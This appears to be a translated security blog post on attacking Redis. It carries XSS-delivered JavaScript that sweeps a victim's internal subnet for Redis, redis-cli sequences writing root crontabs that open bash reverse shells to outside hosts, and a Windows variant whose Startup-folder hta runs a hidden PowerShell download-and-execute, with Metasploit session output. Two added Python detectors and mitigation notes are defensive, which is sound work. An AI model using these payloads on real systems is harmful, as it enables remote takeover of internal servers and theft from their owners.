July 2016

Use XSS or social engineering to get the target to click my link, then use JS to automatically attack Redis on the internal network,

and use Redis to write cron jobs that spawn reverse shells in bulk.

Port-scanning 6379 across the internal network from JS is not easy to implement, so no port probing is done; the exploit is simply run once against every host in the subnet.

The following code obtains the internal IP range:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8" />
    <title>Document</title>
</head>
<body>
    
</body>
<script>
    ipList = []
    var webrtcxss = {
    webrtc        : function(callback){
        var ip_dups           = {};
        var RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
        var mediaConstraints  = {
            optional: [{RtpDataChannels: true}]
        };
        var servers = undefined;
        if(window.webkitRTCPeerConnection){
            servers = {iceServers: []};
        }
        var pc = new RTCPeerConnection(servers, mediaConstraints);
        pc.onicecandidate = function(ice){
            if(ice.candidate){
                var ip_regex        = /([0-9]{1,3}(\.[0-9]{1,3}){3})/;
                var ip_addr         = ip_regex.exec(ice.candidate.candidate)[1]; 
                if(ip_dups[ip_addr] === undefined)
                callback(ip_addr);
                ip_dups[ip_addr]    = true;
            }
        };
        pc.createDataChannel("");
        pc.createOffer(function(result){
            pc.setLocalDescription(result, function(){});
        });
    },
    getIp        : function(){
        this.webrtc(function(ip){
            ipList.push(ip);
        });
    }
}
webrtcxss.getIp()
setTimeout(function() {
    alert(ipList)
}, 300)
</script>
</html>

The result is shown in the figure below.

How the Ajax attack on Redis works:

Reference articles: http://benmmurphy.github.io/blog/2015/06/04/redis-eval-lua-sandbox-escape/

https://www.t00ls.net/thread-34873-1-1.html

http://www.freebuf.com/articles/web/19622.html

Below is an example of using Ajax to make Redis write a cron job that spawns a reverse shell:

var ip = '192.168.203.2';
var port= '6379';
var dir = '/var/spool/cron/';
var filename = 'root';
var content = '*/1 * * * * /bin/bash -i >& /dev/tcp/phpinfo.me/53 0>&1';
var url = "http://" + ip + ":" + port;

var cmd = new XMLHttpRequest();
cmd.open("POST",  url);
cmd.send('eval \'' + 'redis.call(\"set\", \"hacked\", "\\r\\n\\n'+content+'\\n\\n\\n\\n\"); redis.call(\"config\", \"set\", \"dir\", \"' + dir + '/\"); redis.call(\"config\", \"set\", \"dbfilename\", \"'+filename+'\"); ' + '\' 0' + "\r\n");
 
var cmd = new XMLHttpRequest();
cmd.open("POST",  url);
cmd.send('save\r\n');

Finally, obtain the internal IP automatically and attack hosts 1-255 of the internal subnet in bulk:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8" />
    <title>Document</title>
</head>
<body>
    
</body>
<script>
    ipList = []
    var webrtcxss = {
    webrtc        : function(callback){
        var ip_dups           = {};
        var RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
        var mediaConstraints  = {
            optional: [{RtpDataChannels: true}]
        };
        var servers = undefined;
        if(window.webkitRTCPeerConnection){
            servers = {iceServers: []};
        }
        var pc = new RTCPeerConnection(servers, mediaConstraints);
        pc.onicecandidate = function(ice){
            if(ice.candidate){
                var ip_regex        = /([0-9]{1,3}(\.[0-9]{1,3}){3})/;
                var ip_addr         = ip_regex.exec(ice.candidate.candidate)[1]; 
                if(ip_dups[ip_addr] === undefined)
                callback(ip_addr);
                ip_dups[ip_addr]    = true;
            }
        };
        pc.createDataChannel("");
        pc.createOffer(function(result){
            pc.setLocalDescription(result, function(){});
        });
    },
    getIp        : function(){
        this.webrtc(function(ip){
            ipList.push(ip);
        });
    }
}
webrtcxss.getIp()
setTimeout(function() {
    for(var i in ipList) {
        if(ipList[i]) {
            var iparr = ipList[i].split(".");
            for(var i=0;i<255;i++) {
                var attkip = iparr [0] + "." + iparr [1] + "." + iparr [2] + "." + i;
                send(attkip);
            }
        }
    }
}, 300);

function send(ip) {
    var port= '6379';
    var dir = '/var/spool/cron/';
    var filename = 'root';
    var content = '*/1 * * * * /bin/bash -i >& /dev/tcp/phpinfo.me/53 0>&1';
    var url = "http://" + ip + ":" + port;

    var cmd = new XMLHttpRequest();
    cmd.open("POST",  url);
    cmd.send('eval \'' + 'redis.call(\"set\", \"hacked\", "\\r\\n\\n'+content+'\\n\\n\\n\\n\"); redis.call(\"config\", \"set\", \"dir\", \"' + dir + '/\"); redis.call(\"config\", \"set\", \"dbfilename\", \"'+filename+'\"); ' + '\' 0' + "\r\n");
     
    var cmd = new XMLHttpRequest();
    cmd.open("POST",  url);
    cmd.send('save\r\n');
    
}

</script>
</html>

If 1-255 isn't enough, add another for loop.

The attack code is sent to the internal Redis instances automatically.

Then listen with nc on your own server on the port you configured, and you'll find the server is already sitting there.

ok

A test module has been added to the XSS platform: http://xss.phpinfo.me/
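What makes this delivery work is that Redis speaks a newline-delimited inline protocol: each line of the browser's HTTP request (the POST request line, the Host: header and the rest) is read as a command and rejected as unknown, and the connection stays open until the body lines arrive and run as genuine EVAL, CONFIG SET and SAVE commands. On the server that leaves a very recognisable trail. The Python script below is an added example, not part of the original post: it parses Redis MONITOR output and flags HTTP request lines or headers arriving as commands, CONFIG SET dir/dbfilename pointing at a location some other program interprets, and a SAVE issued while dir has been redirected. The MONITOR sample is constructed for this example (the client 192.168.203.50 is invented; Redis reports commands issued from inside a Lua script with the client field shown as lua), and SENSITIVE_DIRS is an assumption to extend for your own environment. Two caveats a defender should know: Redis 3.2 introduced protected mode, which refuses non-loopback connections when no bind address and no password are configured, and Redis 3.2.7 additionally closes any connection that sends a POST or Host: command and logs a "Possible SECURITY ATTACK detected" warning; binding to localhost, setting requirepass and renaming CONFIG via rename-command remain the standard mitigations.

```python
import re

# Redis MONITOR line: <unix-time> [<db> <client>] "<cmd>" "<arg>" ...
# The client field is "ip:port", or "lua" for commands issued from an EVAL script.
LINE_RE = re.compile(r'^(\S+) \[(\d+) ([^\]]+)\] (.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Directories whose contents another program interprets (cron, sshd, a web
# server, the Windows Startup folder). Assumption: extend for your environment.
SENSITIVE_DIRS = ("/var/spool/cron", "/etc/cron", "/.ssh", "/var/www",
                  "start menu\\programs\\startup")
# HTTP methods that are not Redis commands (GET is a real Redis command, so it
# is deliberately absent); HTTP headers are caught by their trailing colon.
HTTP_METHODS = {"post", "put", "options", "head"}


def parse_monitor_line(line):
    """Return {'ts', 'db', 'client', 'args'} for one MONITOR line, or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, db, client, rest = m.groups()
    args = [a.replace('\\"', '"') for a in ARG_RE.findall(rest)]
    return {"ts": float(ts), "db": int(db), "client": client, "args": args}


def detect(monitor_text):
    """Scan MONITOR output; return (severity, line_no, client, reason) tuples."""
    alerts = []
    rdb_dir = None            # CONFIG is server-wide, so track it across clients
    dir_is_sensitive = False
    for n, line in enumerate(monitor_text.splitlines(), 1):
        ev = parse_monitor_line(line)
        if not ev or not ev["args"]:
            continue
        args, who = ev["args"], ev["client"]
        cmd = args[0].lower()

        # 1. An HTTP request line or header reached Redis: something on port 6379
        #    is being driven by a browser or proxy (cross-protocol request).
        if cmd in HTTP_METHODS or cmd.endswith(":"):
            alerts.append(("high", n, who,
                           f"HTTP artefact {args[0]!r} parsed as a Redis command"))
            continue

        # 2. A Lua script that reconfigures where the next dump is written.
        if cmd == "eval" and len(args) > 1:
            script = args[1].lower()
            if "config" in script and ("dir" in script or "dbfilename" in script):
                alerts.append(("high", n, who, "EVAL script changes dir/dbfilename"))

        # 3. CONFIG SET of dir / dbfilename, whether sent directly or seen as
        #    "[0 lua]" when issued from inside a script.
        if cmd == "config" and len(args) >= 4 and args[1].lower() == "set":
            param, value = args[2].lower(), args[3]
            if param == "dir":
                rdb_dir = value
                dir_is_sensitive = any(s in value.lower() for s in SENSITIVE_DIRS)
                if dir_is_sensitive:
                    alerts.append(("high", n, who, f"CONFIG SET dir {value!r}"))
            elif param == "dbfilename" and not value.lower().endswith(".rdb"):
                alerts.append(("medium", n, who, f"CONFIG SET dbfilename {value!r}"))

        # 4. The dump is actually written while dir points somewhere dangerous.
        if cmd in ("save", "bgsave") and dir_is_sensitive:
            alerts.append(("critical", n, who,
                           f"{cmd.upper()} with dir={rdb_dir!r}: dump lands in a sensitive path"))
    return alerts


# Constructed MONITOR sample (not captured from any real host): a browser-
# originated request sequence, then a legitimate client doing a normal SAVE.
SAMPLE_MONITOR = """\
1467331200.100001 [0 192.168.203.50:49152] "PING"
1467331200.200002 [0 192.168.203.50:49153] "POST" "/" "HTTP/1.1"
1467331200.200003 [0 192.168.203.50:49153] "Host:" "192.168.203.2:6379"
1467331200.200004 [0 192.168.203.50:49153] "eval" "redis.call(\\"set\\", \\"hacked\\", \\"...\\"); redis.call(\\"config\\", \\"set\\", \\"dir\\", \\"/var/spool/cron//\\")" "0"
1467331200.200005 [0 lua] "set" "hacked" "..."
1467331200.200006 [0 lua] "config" "set" "dir" "/var/spool/cron//"
1467331200.200007 [0 lua] "config" "set" "dbfilename" "root"
1467331200.300008 [0 192.168.203.50:49154] "POST" "/" "HTTP/1.1"
1467331200.300009 [0 192.168.203.50:49154] "save"
1467331201.000010 [0 10.0.0.9:6001] "set" "session:42" "abc"
1467331201.000011 [0 10.0.0.9:6001] "config" "set" "dir" "/var/lib/redis"
1467331201.000012 [0 10.0.0.9:6001] "save"
"""

if __name__ == "__main__":
    for sev, n, who, why in detect(SAMPLE_MONITOR):
        print(f"[{sev:8}] line {n:2} {who:24} {why}")
```

Feed it the output of `redis-cli MONITOR` saved to a file; a clean log produces no alerts, and the legitimate client at the end of the sample shows that a SAVE with dir left at the data directory is not flagged.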

redis

Linux exploitation (reposted from wooyun)

A Redis exploit that doesn't need flushall at all (which would destroy data): with redis-cli set 1 'ringzero' you control the first record, which guarantees your content always stays at the very front;

Test environment: CentOS, RHEL

# Reverse shell via crontab

redis-cli flushall 
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"|redis-cli -x set 1 
redis-cli config set dir /var/spool/cron/ 
redis-cli config set dbfilename root 
redis-cli save

# Create the file /tmp/888 via crontab

redis-cli flushall # for easier testing
redis-cli set test 'test' 
redis-cli set my 'mymymymymymymymymymymymy' 
redis-cli set word 'wordwordwordwordwordword' 
redis-cli set hello 'ringzero' 
redis-cli set word1 'word1word1word1word1word1word1' 
echo -e "\n\n*/1 * * * * /bin/touch /tmp/888\n\n"|redis-cli -x set 1 
redis-cli config set dir /var/spool/cron/ 
redis-cli config set dbfilename root 
redis-cli save
redis-cli flushall 
echo -e "\n\n*/1 * * * * /bin/touch /tmp/888\n\n"|redis-cli -x set 1 
redis-cli config set dir /var/spool/cron/ 
redis-cli config set dbfilename root 
redis-cli save

# Rewrite the crontab a second time

redis-cli flushall 
redis-cli set 2 ';a=`redis-cli get c`;' 
redis-cli set 1 'id;redis-cli set r `$a`;#' 
redis-cli config set dir /tmp/ 
redis-cli config set dbfilename w 
redis-cli save 
redis-cli set c whoami

# Using the crontab-writing step from step 1, run the following commands

echo " " > /tmp/zz 
cat /tmp/w >> /tmp/zz 
/bin/sh /tmp/zz 
redis-cli get r

Control /var/spool/cron/root and /tmp/zz

# Final result: every 10 seconds, read the command to run from the Redis variable c and write its output into variable r

* * * * * sleep 10;/bin/sh /tmp/zz
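Whatever SAVE writes to dir/dbfilename is an RDB dump, not a crontab: the file starts with the ASCII magic REDIS and a four-digit format version, the stored value sits between binary framing bytes, and on the CentOS/RHEL setup above cron tolerates the unparseable lines and runs the one embedded entry (the Windows variant below relies on mshta being equally tolerant of a .hta carrying the same header). That header is the cleanest forensic indicator of this technique in a crontab, authorized_keys or startup file. The Python scanner below is an added example, not code from wooyun or from the original post: it checks files for the RDB magic and extracts the printable crontab-shaped lines plus any line carrying a marker that does not belong in such a file. The sample bytes are constructed here (the RDB layout is only loosely imitated; the scanner relies on the magic and on text lines, not on full RDB parsing), and DEFAULT_PATHS lists typical locations as an assumption to adjust for the host being examined.

```python
import re

RDB_MAGIC = b"REDIS"   # every RDB dump starts with "REDIS" + a four-digit format version

# A crontab entry: five schedule fields (or an @reboot-style shortcut) and a command.
CRON_LINE_RE = re.compile(rb"^(?:(?:[\d*/,\-]+\s+){5}|@\w+\s+)\S.*$")

# Strings that have no business in a crontab, authorized_keys or Startup file.
PAYLOAD_MARKERS = (b"/dev/tcp/", b"ssh-rsa", b"ssh-ed25519", b"<script",
                   b"powershell", b"<?php")


def _printable(line: bytes) -> bool:
    """True for a non-empty line made only of printable ASCII."""
    return bool(line) and all(32 <= b < 127 for b in line)


def scan_for_redis_dump(data: bytes):
    """Return a finding dict if `data` is an RDB dump, otherwise None.

    Cron (and mshta for an .hta) tolerate the binary framing around the stored
    value, so the text lines embedded in the dump are what actually executes;
    they are extracted here for the analyst.
    """
    if not data.startswith(RDB_MAGIC):
        return None
    finding = {
        "rdb_version": data[5:9].decode("ascii", "replace"),
        "cron_entries": [],
        "payload_lines": [],
    }
    for raw in data.split(b"\n"):
        line = raw.strip(b" \t\r")
        if not _printable(line):
            continue            # binary RDB framing, skipped just as cron skips it
        text = line.decode("ascii")
        if CRON_LINE_RE.match(line):
            finding["cron_entries"].append(text)
        if any(marker in line.lower() for marker in PAYLOAD_MARKERS):
            finding["payload_lines"].append(text)
    return finding


def scan_files(paths):
    """Scan the given files; missing or unreadable paths are skipped."""
    results = {}
    for path in paths:
        try:
            with open(path, "rb") as fh:
                data = fh.read(1 << 20)
        except OSError:
            continue
        finding = scan_for_redis_dump(data)
        if finding:
            results[path] = finding
    return results


def build_constructed_rdb(payload: bytes) -> bytes:
    """Constructed test bytes shaped like an RDB dump holding one string value.

    The layout (magic, DB selector, type byte, key '1', length, value, EOF byte,
    checksum) is only loosely imitated; the scanner does not parse RDB structure.
    """
    return (b"REDIS0006" + b"\xfe\x00" + b"\x00\x011" + bytes([len(payload) & 0x3F])
            + payload + b"\xff" + b"\x00" * 8)


# Typical locations; assumption: adjust for the host being examined.
DEFAULT_PATHS = ["/var/spool/cron/root", "/var/spool/cron/crontabs/root",
                 "/etc/crontab", "/root/.ssh/authorized_keys"]

if __name__ == "__main__":
    sample = build_constructed_rdb(b"\n\n*/1 * * * * /bin/touch /tmp/888\n\n")
    print(scan_for_redis_dump(sample))
    print(scan_files(DEFAULT_PATHS))
```

A hit on the magic alone is already decisive: no legitimate crontab, key file or startup item begins with REDIS, so the extracted lines serve to scope the incident rather than to confirm it.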

Windows exploitation (reposted from 90sec)

Redis has not officially released a Windows version, but Redis/Win builds exist in the wild.

During a test I came across a Windows build of Redis, so I started working on it.

Straight to the exploitation, based on msf:

root@weisuo.org:~# cat hta-psh.txt 
 <scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
root@weisuo.org:~# cat hta-psh.txt |redis-cli -x -h 192.168.138.27 set a
OK

Some strings in hta-psh.txt are written in an altered form; otherwise they are lost when written.

#msfconsole 
use payload/windows/meterpreter/reverse_tcp
generate -t hta-psh -f /var/www/1.ps1
# then start a handler (omitted)

Modify 1.ps1; the file contents are roughly as follows:

$command="powershell -nop -w hidden -e xxxxxxxxxxxxxxxx";iex $command;$command2="taskkill /im mshta.exe";iex $command2;

Finally, write the file and wait for an administrator to log in.

root@xxx:~# redis-cli -h 192.168.138.27
redis 192.168.138.27:6379> CONFIG GET dir
1) "dir"
2) "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
redis 192.168.138.27:6379> config get dbfilename
1) "dbfilename"
2) "2.hta"
redis 192.168.138.27:6379> save
OK
redis 192.168.138.27:6379>

msf exploit(handler) > rexploit -j -z
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.
 
[*] Started reverse TCP handler on x.x.x.x:80
msf exploit(handler) > [*] Starting the payload handler...
[*] Sending stage (957999 bytes) to x.x.x.x
[*] Meterpreter session 4 opened (x.x.x.x:80 -> x.x.x.x:56301) at 2016-06-06 11:06:00 -0400
[*] Session ID 4 (x.x.x.x:80 -> x.x.x.x:56301) processing AutoRunScript 'migrate -f'
[*] Current server process: powershell.exe (4896)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3768
[+] Successfully migrated to process